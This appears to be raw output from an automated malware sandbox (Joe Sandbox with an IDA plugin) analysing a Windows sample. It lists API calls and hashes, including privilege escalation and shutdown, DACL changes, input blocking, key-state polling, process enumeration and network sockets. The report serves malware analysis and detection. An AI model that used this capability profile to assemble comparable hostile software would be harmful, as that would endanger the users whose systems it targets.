                                                                                • Part of subcall function 00436D2D: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000,74DF3220,00000000,00000000,00442E95,?,?,?), ref: 00436D4F
                                                                              • FindClose.KERNEL32(00000000,?,?,?,00000000), ref: 00442F92
                                                                              Similarity
                                                                              • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                              • String ID: *.*
                                                                              • API String ID: 2640511053-438819550
                                                                              • Opcode ID: 9379a40a392f11a7e453a238fddec55769e51d026bd73d4c4d0da232c8837110
                                                                              • Instruction ID: 5fd3b3f399b1dfd6b0a62b5043663bf11a2259675d3c80dc16c90576bc2ddb84
                                                                              • Opcode Fuzzy Hash: 9379a40a392f11a7e453a238fddec55769e51d026bd73d4c4d0da232c8837110
                                                                              • Instruction Fuzzy Hash: 0F41E8326083046BD620FA64DD85BEFB3A89BC5311F54492FF95483280E7FEA50D8779
                                                                              APIs
                                                                                • Part of subcall function 004392BC: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 004392DE
                                                                                • Part of subcall function 004392BC: GetLastError.KERNEL32 ref: 004392E4
                                                                                • Part of subcall function 004392BC: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0043930B
                                                                                • Part of subcall function 0043928B: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004392A5
                                                                              • GetSecurityDescriptorDacl.ADVAPI32(?,00000004,?,?,?,?), ref: 00445E4B
                                                                              • _memset.LIBCMT ref: 00445E61
                                                                              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00445E83
                                                                              • GetLengthSid.ADVAPI32(?), ref: 00445E92
                                                                              • GetAce.ADVAPI32(?,00000000,?,?,00000018), ref: 00445EDE
                                                                              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00445EFB
                                                                              • GetLengthSid.ADVAPI32(?,?,00000018), ref: 00445F11
                                                                              • GetLengthSid.ADVAPI32(?,00000008,?,?,00000000,?,00000000), ref: 00445F39
                                                                              • CopySid.ADVAPI32(00000000,?,00000000,?,00000000), ref: 00445F40
                                                                              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?,?,00000000,?,00000000), ref: 00445F6E
                                                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000,?,00000000,?,00000000), ref: 00445F8B
                                                                              • SetUserObjectSecurity.USER32(?,?,?), ref: 00445FA0
                                                                              Similarity
                                                                              • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                              • String ID:
                                                                              • API String ID: 3490752873-0
                                                                              • Opcode ID: b11fc48791dee11005ef1ac308328aec1e94b5ee495351b15ab77ecbbd68b2cc
                                                                              • Instruction ID: 491154c1e478dcf6c9ac3cbca3c2c9e2645d4ee7bbdc2abf5fae4ada557f6fe4
                                                                              • Opcode Fuzzy Hash: b11fc48791dee11005ef1ac308328aec1e94b5ee495351b15ab77ecbbd68b2cc
                                                                              • Instruction Fuzzy Hash: 85519D71108301ABD610DF61CD84E6FB7E9AFC9B04F04491EFA869B242D778E909C76B
                                                                              APIs
                                                                              • OleInitialize.OLE32(00000000), ref: 0047AA03
                                                                              • CLSIDFromProgID.OLE32(00000000,?), ref: 0047AA27
                                                                              • CoCreateInstance.OLE32(?,00000000,00000005,004829C0,?), ref: 0047AAAA
                                                                              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0047AB6B
                                                                              • _memset.LIBCMT ref: 0047AB7C
                                                                              • _wcslen.LIBCMT ref: 0047AC68
                                                                              • _memset.LIBCMT ref: 0047ACCD
                                                                              • CoCreateInstanceEx.OLE32 ref: 0047AD06
                                                                              • CoSetProxyBlanket.OLE32(004829D0,?,?,?,?,?,?,00000800), ref: 0047AD53
                                                                              Strings
                                                                              • NULL Pointer assignment, xrefs: 0047AD84
                                                                              Similarity
                                                                              • API ID: CreateInitializeInstance_memset$BlanketFromProgProxySecurity_wcslen
                                                                              • String ID: NULL Pointer assignment
                                                                              • API String ID: 1588287285-2785691316
                                                                              • Opcode ID: 40e9c8eb680feb4042e694522f3113d29542bf103086fe34e1494599e09369de
                                                                              • Instruction ID: 16786b45dbc5194aa398acfc0f0ff3b91b98a178c64a073a91da7f4e0cb75f58
                                                                              • Opcode Fuzzy Hash: 40e9c8eb680feb4042e694522f3113d29542bf103086fe34e1494599e09369de
                                                                              • Instruction Fuzzy Hash: 54B10DB15083409FD320EF65C881B9FB7E8BBC8744F108E2EF58997291D7759948CB66
                                                                              APIs
                                                                              • GetCurrentProcess.KERNEL32(00000028,?), ref: 004364B9
                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 004364C0
                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004364D6
                                                                              • AdjustTokenPrivileges.ADVAPI32 ref: 004364FE
                                                                              • GetLastError.KERNEL32 ref: 00436504
                                                                              • ExitWindowsEx.USER32(?,00000000), ref: 00436527
                                                                              • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 00436557
                                                                              • SetSystemPowerState.KERNEL32(00000001,00000000), ref: 0043656A
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                                                                              • String ID: SeShutdownPrivilege
                                                                              • API String ID: 2938487562-3733053543
                                                                              • Opcode ID: 9f228ad1da6a4c81f8cb5394189ecc1147849337ed66d96e43b1ced3868a671c
                                                                              • Instruction ID: b625d7910520021a286729d09db348b3c4b0b131b75d5259d4bd29649b467962
                                                                              • Opcode Fuzzy Hash: 9f228ad1da6a4c81f8cb5394189ecc1147849337ed66d96e43b1ced3868a671c
                                                                              • Instruction Fuzzy Hash: E021D5B02803017FF7149B64DD4AF6B3398EB48B10F948829FE09852D2D6BDE844973D
                                                                              APIs
                                                                              • __swprintf.LIBCMT ref: 00436162
                                                                              • __swprintf.LIBCMT ref: 00436176
                                                                                • Part of subcall function 0041353A: __woutput_l.LIBCMT ref: 0041358F
                                                                              • __wcsicoll.LIBCMT ref: 00436185
                                                                              • FindResourceW.KERNEL32(?,?,0000000E), ref: 004361A6
                                                                              • LoadResource.KERNEL32(?,00000000), ref: 004361AE
                                                                              • LockResource.KERNEL32(00000000), ref: 004361B5
                                                                              • FindResourceW.KERNEL32(?,?,00000003), ref: 004361DA
                                                                              • LoadResource.KERNEL32(?,00000000), ref: 004361E4
                                                                              • SizeofResource.KERNEL32(?,00000000), ref: 004361F0
                                                                              • LockResource.KERNEL32(?), ref: 004361FD
                                                                              Similarity
                                                                              • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll__woutput_l
                                                                              • String ID:
                                                                              • API String ID: 2406429042-0
                                                                              • Opcode ID: c1b2c305ea449a9eaa2c50be24a6d356ee30b865a6e7eb3c9e4c44cc17d92184
                                                                              • Instruction ID: 79d88324f8a28cdfdddc37bd7103cac5134eefaeeaedb246b69d205017f9fa0d
                                                                              • Opcode Fuzzy Hash: c1b2c305ea449a9eaa2c50be24a6d356ee30b865a6e7eb3c9e4c44cc17d92184
                                                                              • Instruction Fuzzy Hash: 82313432104210BFD700EF64ED88EAF77A9FB89304F00882BFA4196150E778D940CB68
                                                                              APIs
                                                                              • SetErrorMode.KERNEL32(00000001), ref: 0045D522
                                                                              • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D593
                                                                              • GetLastError.KERNEL32 ref: 0045D59D
                                                                              • SetErrorMode.KERNEL32(?), ref: 0045D629
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: Error$Mode$DiskFreeLastSpace
                                                                              • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                              • API String ID: 4194297153-14809454
                                                                              • Opcode ID: 49e0e17e9479d30b414134c7f78092e00673ae1a45d158f41d80208550ba4cb8
                                                                              • Instruction ID: 49a1caac5541b587bc648ef7caa6256b54369420b38b3993b587487a6931f65b
                                                                              • Opcode Fuzzy Hash: 49e0e17e9479d30b414134c7f78092e00673ae1a45d158f41d80208550ba4cb8
                                                                              • Instruction Fuzzy Hash: BA31AD75A083009FC310EF55D98090BB7E1AF89315F448D6FF94997362D778E9068B6A
                                                                              APIs
                                                                              • MkParseDisplayName.OLE32(?,00000000,?,?), ref: 0047AF0F
                                                                                • Part of subcall function 004781AE: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
                                                                                • Part of subcall function 004781AE: VariantCopy.OLEAUT32(?,?), ref: 00478259
                                                                                • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
                                                                                • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
                                                                              • OleInitialize.OLE32(00000000), ref: 0047AE06
                                                                                • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                              • _wcslen.LIBCMT ref: 0047AE18
                                                                              • CreateBindCtx.OLE32(00000000,?), ref: 0047AEC2
                                                                              • CLSIDFromProgID.OLE32(00000000,?,?), ref: 0047AFCC
                                                                              • GetActiveObject.OLEAUT32(?,00000000,?), ref: 0047AFF9
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: CopyVariant$_wcslen$ActiveBindCreateDisplayErrorFromInitializeLastNameObjectParseProg_wcscpy
                                                                              • String ID: HH
                                                                              • API String ID: 1915432386-2761332787
                                                                              • Opcode ID: e5cc958d5f324366fbee3d2ecbe33304f19c15b46d8e68c756c5eb73bbadfcb0
                                                                              • Instruction ID: 7e3b4e38c6064d991530b19baaff212313fd3e9d55f264e0ba959e8ba912c45c
                                                                              • Opcode Fuzzy Hash: e5cc958d5f324366fbee3d2ecbe33304f19c15b46d8e68c756c5eb73bbadfcb0
                                                                              • Instruction Fuzzy Hash: 6C915C71604301ABD710EB65CC85F9BB3E8AFC8714F10892EF64597291EB78E909CB5A
                                                                              Strings
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: DEFINE$`$h$h
                                                                              • API String ID: 0-4194577831
                                                                              • Opcode ID: 53b7279d5b659778b651e94439d899c69cc4b33ac19e6b5c077e56500386ae31
                                                                              • Instruction ID: b1cbab3e2140d6a963e4b85c5b61650905c2e88cbb7a9c7ccaf19de07e543520
                                                                              • Opcode Fuzzy Hash: 53b7279d5b659778b651e94439d899c69cc4b33ac19e6b5c077e56500386ae31
                                                                              • Instruction Fuzzy Hash: 9802A1715083818FE725CF29C88076BBBE2BFD5304F28896EE89587342D779D849CB56
                                                                              APIs
                                                                              • socket.WSOCK32(00000002,00000001,00000006), ref: 004648B0
                                                                              • WSAGetLastError.WSOCK32(00000000,00000002,00000001,00000006,?,00000000), ref: 004648BE
                                                                              • bind.WSOCK32(00000000,?,00000010), ref: 004648DA
                                                                              • WSAGetLastError.WSOCK32(00000000,00000000,?,00000010,00000002,00000001,00000006,?,00000000), ref: 004648E6
                                                                              • closesocket.WSOCK32(00000000), ref: 0046492D
                                                                              Similarity
                                                                              • API ID: ErrorLast$bindclosesocketsocket
                                                                              • String ID:
                                                                              • API String ID: 2609815416-0
                                                                              • Opcode ID: c745fc0386eefc9461b0625fcf5f9e880147eba2f1499b917674c09f315cfe6e
                                                                              • Instruction ID: d240999dee57073d64b91b26c15bb406cb7727aead8f71c00845428af50f987f
                                                                              • Opcode Fuzzy Hash: c745fc0386eefc9461b0625fcf5f9e880147eba2f1499b917674c09f315cfe6e
                                                                              • Instruction Fuzzy Hash: C731CB712002009BD710FF2ADC81B6BB3E8EF85724F144A5FF594A72D2D779AC85876A
                                                                              APIs
                                                                              • CreateToolhelp32Snapshot.KERNEL32 ref: 00437043
                                                                              • Process32FirstW.KERNEL32(00000000,00000002), ref: 00437050
                                                                              • Process32NextW.KERNEL32(00000000,?), ref: 00437075
                                                                              • __wsplitpath.LIBCMT ref: 004370A5
                                                                                • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                                                              • _wcscat.LIBCMT ref: 004370BA
                                                                              • __wcsicoll.LIBCMT ref: 004370C8
                                                                              • CloseHandle.KERNEL32(00000000,?), ref: 00437105
                                                                              Similarity
                                                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                                                              • String ID:
                                                                              • API String ID: 2547909840-0
                                                                              • Opcode ID: fd838752e9d0606085fad0ec29118efadb7b5f17250a81beb0a2f2c9513d2e10
                                                                              • Instruction ID: d866d71778569fbbd99b025f777f77cc3db9ba9c83dfb601fa45888e96c7797d
                                                                              • Opcode Fuzzy Hash: fd838752e9d0606085fad0ec29118efadb7b5f17250a81beb0a2f2c9513d2e10
                                                                              • Instruction Fuzzy Hash: 9C21A7B20083819BD735DB55C881BEFB7E8BB99304F00491EF5C947241EB79A589CB6A
                                                                              APIs
                                                                                • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                              • FindFirstFileW.KERNEL32(?,?,?,?,?,00000000), ref: 0045217E
                                                                              • Sleep.KERNEL32(0000000A,?,?,00000000), ref: 004521B2
                                                                              • FindNextFileW.KERNEL32(?,?,?,00000000), ref: 004522AC
                                                                              • FindClose.KERNEL32(?,?,00000000), ref: 004522C3
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: Find$File$CloseFirstNextSleep_wcslen
                                                                              • String ID: *.*
                                                                              • API String ID: 2693929171-438819550
                                                                              • Opcode ID: 17936c38af85c1dbfc3d1ebbd0b26446ca2a596e07a4ad84d79ac0689e190811
                                                                              • Instruction ID: e6452ff64139cddd5fd774ab19bf2199aa97b2a19dc0f7115334900b47d689b2
                                                                              • Opcode Fuzzy Hash: 17936c38af85c1dbfc3d1ebbd0b26446ca2a596e07a4ad84d79ac0689e190811
                                                                              • Instruction Fuzzy Hash: BD419D756083409FC314DF25C984A9FB7E4BF86305F04491FF98993291DBB8E949CB5A
                                                                              APIs
                                                                              • __wcsicoll.LIBCMT ref: 0043643C
                                                                              • mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 00436452
                                                                              • __wcsicoll.LIBCMT ref: 00436466
                                                                              • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043647C
                                                                              Strings
Similarity
• API ID: __wcsicollmouse_event
• String ID: DOWN
• API String ID: 1033544147-711622031
APIs
  • Part of subcall function 004647A2: inet_addr.WSOCK32(?), ref: 004647C7
• socket.WSOCK32(00000002,00000002,00000011), ref: 00474213
• WSAGetLastError.WSOCK32(00000000), ref: 00474233
Similarity
• API ID: ErrorLastinet_addrsocket
• String ID:
• API String ID: 4170576061-0
APIs
• GetCursorPos.USER32(004A83D8), ref: 0045636A
• ScreenToClient.USER32(004A83D8,?), ref: 0045638A
• GetAsyncKeyState.USER32(?), ref: 004563D0
• GetAsyncKeyState.USER32(?), ref: 004563DC
• GetWindowLongW.USER32(?,000000F0), ref: 00456430
Similarity
• API ID: AsyncState$ClientCursorLongScreenWindow
• String ID:
• API String ID: 3539004672-0
APIs
  • Part of subcall function 0046DD22: IsWindow.USER32(00000000), ref: 0046DD51
• IsWindowVisible.USER32 ref: 00477314
• IsWindowEnabled.USER32 ref: 00477324
• GetForegroundWindow.USER32(?,?,?,00000001,?,?), ref: 00477331
• IsIconic.USER32 ref: 0047733F
• IsZoomed.USER32 ref: 0047734D
Similarity
• API ID: Window$EnabledForegroundIconicVisibleZoomed
• String ID:
• API String ID: 292994002-0
APIs
• CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000,74DF3220,00000000,00000000,00442E95,?,?,?), ref: 00436D4F
• SetFileTime.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000), ref: 00436D8C
• CloseHandle.KERNEL32(00000000,?,?,?,00000000), ref: 00436D93
Similarity
• API ID: File$CloseCreateHandleTime
• String ID:
• API String ID: 3397143404-0
APIs
Similarity
• API ID: _strncmp
• String ID: ACCEPT$^$h
• API String ID: 909875538-4263704089
APIs
• FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045C9BE
• FindNextFileW.KERNEL32(00000000,?), ref: 0045CA1B
• FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CA4A
Similarity
• API ID: Find$File$CloseFirstNext
• String ID:
• API String ID: 3541575487-0
APIs
• GetFileAttributesW.KERNEL32(00000001,00000000), ref: 00436AEF
• FindFirstFileW.KERNEL32(00000001,?), ref: 00436B00
• FindClose.KERNEL32(00000000), ref: 00436B13
Similarity
• API ID: FileFind$AttributesCloseFirst
• String ID:
• API String ID: 48322524-0
APIs
• __time64.LIBCMT ref: 004433A2
  • Part of subcall function 00414CEF: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,004341DB,00000000,?,0044248A,?,?,?,0048B850), ref: 00414CFA
  • Part of subcall function 00414CEF: __aulldiv.LIBCMT ref: 00414D1A
Similarity
• API ID: Time$FileSystem__aulldiv__time64
• String ID: rJ
• API String ID: 2893107130-1865492326
APIs
• __time64.LIBCMT ref: 004433A2
  • Part of subcall function 00414CEF: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,004341DB,00000000,?,0044248A,?,?,?,0048B850), ref: 00414CFA
  • Part of subcall function 00414CEF: __aulldiv.LIBCMT ref: 00414D1A
Similarity
• API ID: Time$FileSystem__aulldiv__time64
• String ID: rJ
• API String ID: 2893107130-1865492326
APIs
• InternetQueryDataAvailable.WININET(?,?,?,?,00000000,00000000), ref: 004428C2
• InternetReadFile.WININET(?,00000000,?,?), ref: 004428F9
  • Part of subcall function 0044286A: GetLastError.KERNEL32(00000000,0044AA07,?,00000000,00000000,00000001,?,?), ref: 00442880
                                                                              Similarity
                                                                              • API ID: Internet$AvailableDataErrorFileLastQueryRead
                                                                              • String ID:
                                                                              • API String ID: 901099227-0
                                                                              • Opcode ID: 0771251b70b9bd68c35fac6f7da5b5f16004994504cb59d35d549d3fc14a9ba4
                                                                              • Instruction ID: 2c15810e60b1cb59304632cc8162977c32d0240baa2dcf3c2cd6ef22f942a6bb
                                                                              • Opcode Fuzzy Hash: 0771251b70b9bd68c35fac6f7da5b5f16004994504cb59d35d549d3fc14a9ba4
                                                                              • Instruction Fuzzy Hash: 452174B12043016BF220EF56DD45FAFB3E8ABD4715F40492EF285A6180D7B8E949C76A
APIs
• FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045DDA1
• FindClose.KERNEL32(00000000), ref: 0045DDDD
Memory Dump Source
• Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
Similarity
• API ID: Find$CloseFileFirst
• String ID:
• API String ID: 2295610775-0
• Opcode ID: eac1d012b3ae473636f11b903683455954ec17c127a785734040b224e9a5f79e
• Instruction ID: 3577cc1601137e614a3334ffa73c6d258275d41fe8d72aaca367a27ef3e2a016
• Opcode Fuzzy Hash: eac1d012b3ae473636f11b903683455954ec17c127a785734040b224e9a5f79e
• Instruction Fuzzy Hash: DE11E5766002049FD710EF6ADC89A5AF7E5EF84325F10892EF958D7281CB75E8048B94
Strings
Memory Dump Source
• Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
Similarity
• API ID:
• String ID: 0vH$HH
• API String ID: 0-728391547
• Opcode ID: 96d535d6e61c6cd6e5d21badf476ce2a2faa32e114d6f0ae27a3d334794412dd
• Instruction ID: 538a6706abcc28c04bdc151be30d2aa4e2083a8dfdfa6c30a7857f36827e6882
• Opcode Fuzzy Hash: 96d535d6e61c6cd6e5d21badf476ce2a2faa32e114d6f0ae27a3d334794412dd
• Instruction Fuzzy Hash: 60E1BE725143109FC310EF25C881A9FB7E5AFC4708F108D2EF589AB281D779E946CB9A
APIs
Memory Dump Source
• Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
Similarity
• API ID: _memset
• String ID:
• API String ID: 2102423945-0
• Opcode ID: b8def19716de174921965326585c8a0a0c2eba4d3f226f62ebfac136bfb84777
• Instruction ID: fac722ae1e10b3ad9494cda40f9fb3e9e62b3c26aea04ddfc6562ea9d2065ebb
• Opcode Fuzzy Hash: b8def19716de174921965326585c8a0a0c2eba4d3f226f62ebfac136bfb84777
• Instruction Fuzzy Hash: C512B4B7B983194FDB48DEE4DCC169573E1FB98304F09A43C9A15C7306F6E8AA094794
APIs
• DefDlgProcW.USER32(?,?,?,?,004A83D8,?), ref: 0047E22C
Memory Dump Source
• Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
Similarity
• API ID: Proc
• String ID:
• API String ID: 2346855178-0
• Opcode ID: 4f476b527310cd4595d6f2246be334f82b87c4d4a511bc9a4ae10ad49a3a576c
• Instruction ID: e1c03c818efbd3cbf3664a0c3e659178dbc9a05004c0f073233894ce1d713c90
• Opcode Fuzzy Hash: 4f476b527310cd4595d6f2246be334f82b87c4d4a511bc9a4ae10ad49a3a576c
• Instruction Fuzzy Hash: 4EB1E63330602429E114916BBC88EBFBB9CD7D677BB208B7FF142C1582DB5B6425A179
APIs
• BlockInput.USER32(00000001), ref: 0045A272
Memory Dump Source
• Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
Similarity
• API ID: BlockInput
• String ID:
• API String ID: 3456056419-0
• Opcode ID: f8b7596c9daf0cf449ec099d4cdbafb4be693b9bdeaa48314d03f681346fce8b
• Instruction ID: 5d782454ef4d0180448527013755d2523f66e5fc327f68786c1d80a86620ac83
• Opcode Fuzzy Hash: f8b7596c9daf0cf449ec099d4cdbafb4be693b9bdeaa48314d03f681346fce8b
• Instruction Fuzzy Hash: D2E04F752043019BC700EF71C545A5BB7E4AF94314F108C6EF845A7351D775AC45CB66
APIs
• LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 0043918E
Memory Dump Source
• Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
Similarity
• API ID: LogonUser
• String ID:
• API String ID: 1244722697-0
• Opcode ID: 365ca9639b26e9c6c56151d88f527b1e4ffaee0f54dfd66c8778d151900be7f4
• Instruction ID: 63114e5cfb2c4979e73f5d19eacf740c811f86df1a08bc2cb556a5e36cce81ff
• Opcode Fuzzy Hash: 365ca9639b26e9c6c56151d88f527b1e4ffaee0f54dfd66c8778d151900be7f4
• Instruction Fuzzy Hash: 8DD0ECB52686066FD204CB24D846E2B77E9A7C4701F008A0CB196D2280C670D805CA32
APIs
Memory Dump Source
• Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
Similarity
• API ID: NameUser
• String ID:
• API String ID: 2645101109-0
• Opcode ID: b783c70369e54a54257db95ea8fbffa2a0b511f3d9d58af1a6b6f1143851980f
• Instruction ID: 8011c19b6c32d183c263453b2018abc548473ce9ed5616c99acac4896e71f792
• Opcode Fuzzy Hash: b783c70369e54a54257db95ea8fbffa2a0b511f3d9d58af1a6b6f1143851980f
• Instruction Fuzzy Hash: F6E08C322083058FC310EF55F8405ABB390EB94311F004C3FE64AA2191DA79920EDFAB
APIs
• SetUnhandledExceptionFilter.KERNEL32(Function_00021FEC), ref: 00422033
Memory Dump Source
• Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
• Opcode ID: 299f58dbcf75cd09f1fee721c9404e411c3f17cf80a1a40ae63587de51767455
• Instruction ID: 3275b40964251646410af8875a24301f93fa315c26af6adae0ca3d0f7a721f84
• Opcode Fuzzy Hash: 299f58dbcf75cd09f1fee721c9404e411c3f17cf80a1a40ae63587de51767455
• Instruction Fuzzy Hash: CD9002743511144A4A011BB16E5D90925D46A586067920875B411C4064DB9840019619
Memory Dump Source
• Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
